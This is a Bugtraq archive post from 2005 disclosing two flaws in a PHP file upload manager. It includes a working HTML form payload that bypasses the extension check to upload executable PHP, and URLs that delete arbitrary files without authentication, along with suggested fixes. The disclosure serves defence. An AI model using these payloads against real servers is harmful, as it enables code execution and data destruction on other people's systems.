Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

File Upload Manager Sploits

From: blackshoe () gmail com
Date: 12 Jun 2005 22:22:45 -0000
Below is some code for a recent unpatched exploit for file managers using php as the base code. Share this with the 
world and help protect.

File Upload Manager - Bypass File Extension and Arbitrary File Delete
nothing to see here @ hackthissite.org

Through an input validation flaw, users are able to upload files that are not on the approve extension list. This can 
potentially allow users to upload .php files and gain permissions of the web server to execute commands and scripts.

The code that checks for invalid file extensions makes use of an uninitialized variable which you can inject values 
into:

        for($i=0;$i<count($file_ext_allow);$i++)
                {
                        if (getlast($fileupload_name)!=$file_ext_allow[$i])
                                $test.="~~";
                }
                $exp=explode("~~",$test);

                if (count($exp)==(count($file_ext_allow)+1))  
                { // (do not upload) } else { // (upload) }

With each mismatch, they add '~~' to the variable 'test' and then compare it to the count of the original valid file 
extensions array.

Users can create an html form with an extra form variable 'test' with the value of '~~~~~~' which will allow you to 
bypass the extension validation:

<form method="post" enctype="multipart/form-data" action="http://www.asdf.com/url/to/fileuploader/index.php";>
file: <input type="file" name="fileupload" class="textfield" size="30">
exxploitz: <input type="text" name="test" class="textfield" size="46" value="~~~~~~">
<input type="submit" value="upload" class="button">
</form>

Fix: Use php's in_array() function to check to see if an extension is in the valid list.


In an unrelated flaw, users are able to delete arbitrary files on the webserver by not checking authentication before 
passing it to delete functions.

url to view a file: /index.php?act=view&file=d2VlLnBocC50eHQ=
url to delete the same file: /index.php?act=del&file=d2VlLnBocC50eHQ=

to choose what file to delete, just do base64_encode("filename");
Previous By Date Next
Previous By Thread Next

Current thread: